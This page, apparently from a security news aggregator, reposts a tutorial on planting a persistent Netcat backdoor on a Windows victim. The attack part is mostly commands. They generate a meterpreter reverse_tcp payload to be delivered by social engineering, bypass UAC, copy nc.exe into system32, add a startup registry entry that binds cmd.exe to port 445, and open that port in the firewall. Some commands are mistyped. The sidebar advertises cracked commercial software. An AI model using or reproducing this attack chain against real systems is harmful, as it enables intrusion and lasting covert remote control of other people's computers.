LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

How to Use Netcat as a Persistent Backdoor Utility?

3 months ago 21
BOOK THIS SPACE FOR AD
ARTICLE AD

Pentester Club

Metasploit is a handy Cybersecurity framework that has a number of payloads and exploits to help people with various penetration testing challenges. The payloads in Metasploit are classified into (i) Single and (ii) Stager modules. A single is a self-contained payload that operates independently. The stager payloads are host-dependent as they establish a connection between the target and host machines with the help of payload components called stages. Meterpreter and shell are well-known examples of Metasploit stages. The stagers can create single or recurrent backdoors for the users. A single backdoor is a temporary connection that remains active only when the participating machines are alive. If one of the machines goes offline, the connection is lost. On the other hand, the recurrent backdoors are capable of re-establishing the connections at later stages. These backdoors are known as persistent backdoors. In this tutorial, we will learn how to create a persistent backdoor with the help of Metasploit and Netcat utility.

Netcat is a software service that can perform various network management operations, such as traffic monitoring, port scanning, file sharing, communication, and information gathering. In Cybersecurity, one can benefit from these features by transforming the Netcat abilities into penetration testing utilities. For this purpose, the Netcat requires the services of Metasploit framework to generate payload and compromise the target machine with persistent backdoor techniques. The Metasploit works in two phases. First, it generates a payload specific to the target environment. This payload is shared with the target machine using any social engineering technique. In the next step, Metasploit waits for a connection from the victim’s side. When the user interacts with the payload, a session is established between the attacker and the victim machine. The process is explained below in detail.

Generate Payload

First, we need to generate a Metasploit payload. This can be achieved through MSFVenom utility. Since our target is a Windows machine, we can search for Windows payload from the available list of payloads using the following command.

msvenom -l payloads

In this demonstration, we have selected the reverse_tcp stager to establish a TCP connection between the host and the target machine.

We can use the following syntax to generate the desired payload.

msfvenom –p <payload> lhost=<localhost IP> lport=<local port> -f <payload format> > <payload file name>

The localhost IP can be obtained using the ifconfig command. The local port can be any port for listening purposes. In our case, it is 4444. We are interested in a payload with .exe format. Let’s call it the demo.exe payload file.

msfvenom –p windows/meterpreter/reverse_tcp lhost=10.0.2.15 lport=4444 -f exe > demo.exe

We can access the (demo.exe) payload by moving it to the Desktop location.

sudo mv demo.exe ~/Desktop/

Allow the payload file to run as a program by changing permission as shown in the following screenshot.

Now, this payload is ready to be shared with the victim through social engineering techniques.

Listen for Connection

After generating and sharing the payload with the victim, we require a stub that can handle exploits outside the Metasploit framework. For this purpose, we can use the multi/handler exploit utility.

use exploit/multi/handler

The multi/handler needs to know which payload is going to be used by us to compromise the target system. The information can be communicated using the following command.

set payload windows/meterpreter/reverse_tcp

The show options command displays the mandatory parameters of the exploit. In this case, the parameters are the internal IP and the listening port number. We can configure the values using the set command. Both parameters should match the values configured in the payload file.

when the victim interacts with the (demo.exe) bait, a session is established between the host and the target machine.

Configuring Netcat for Persistent Backdoor

Now we have a meterpreter session between the target and host machine. The next step is to create the persistent Netcat backdoor. For this purpose, we need to install the Netcat backdoor on the victim machine. The current session may not allow us to make the required changes on the target system due to limited privileges. For instance, we need to upload the Netcat copy from our Kali Linux machine on the target operating system using the following command.

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

However, the above action gives the following error due to non-admin privileges.

This problem can be solved with the help of the Windows User Account Control (UAC) exploit available in Metasploit. Run the active meterpreter session in the background and search for the windows UAC exploit.

background
search bypassuac

The windows/local/bypassuac works best in the current scenario. Run the exploit using the following commands to bypass the user access control (UAC) protocols.

use exploit/windows/local/bypassuac
set session 1
run

Escalate the account privileges using the getprivis command.

getprivis

Repeat the Netcat upload process command.

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

We can use the Windows registry keys to execute the Netcat on the start-up of the remote host and listen to the desired port. The following Windows registry key can be used for this purpose.

HKLM\software\microsoft\windows\currentversion\

We can optionally run this key to enumerate the values.

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Set the (Netcat) values for the current key using the following command.

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

The above command executes the Netcat on Windows startup to listen and communicate at port 445 on the remote host. We can confirm the addition of the Netcat process in the registry key values by running the value query command.

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

The following screenshot confirms the Netcat (nc) addition to the list.

The Netcat persistent backdoor process is almost complete here. However, the remote Firewall can interrupt the Netact connection. To manage this issue, we can modify the Firewall settings to allow the Netcat connection through the Firewall. Run the meterpreter in command prompt (CMD) mode.

execute -f cmd -i

Check the Firewall configurations (modes) for all the available profiles using the following command.

netsh firewall show opmode

Add the TCP port exception to allow the Netcat to listen and communicate back with the host user when prompted.

netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL

The innocent Netcat has now become a monster penetration testing utility that can connect with the target machine through a persistent backdoor channel.

Netcat Command Menu

Example Command

Conclusion

Netcat is a wonderful networking utility that can become a handy penetration testing tool with the help of the Metasploit framework. However, the Netcat installation as a persistent backdoor depends on the access privileges of the compromised user account.

Read Entire Article
  3. How to Use Netcat as a Persistent Backdoor Utility?

Related

Privilege Escalation in Collaborative Platforms — BugBounty

Privilege Escalation in Collaborative Platforms — BugBounty

Navigating the Evolving Cybersecurity Landscape: An Overview of the 8th Edition of the…

Navigating the Evolving Cybersecurity Landscape: An Overview of the 8th Edition of the…

race condition on BBP

race condition on BBP

My Bug Bounty Hunting Methodology

My Bug Bounty Hunting Methodology

How i got 3 bugs from the wayback urls?

How i got 3 bugs from the wayback urls?

TryHackMe | NoSQLi Walkthrough

TryHackMe | NoSQLi Walkthrough

Trending

1. Allah Ghazanfar
2. Enviro Infra IPO GMP
3. Shami
4. NTPC Green Energy IPO allotment
5. Faf du Plessis
6. Gujarat Titans
7. Jofra Archer
8. Chess
9. Bhuvneshwar Kumar
10. Manchester United

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved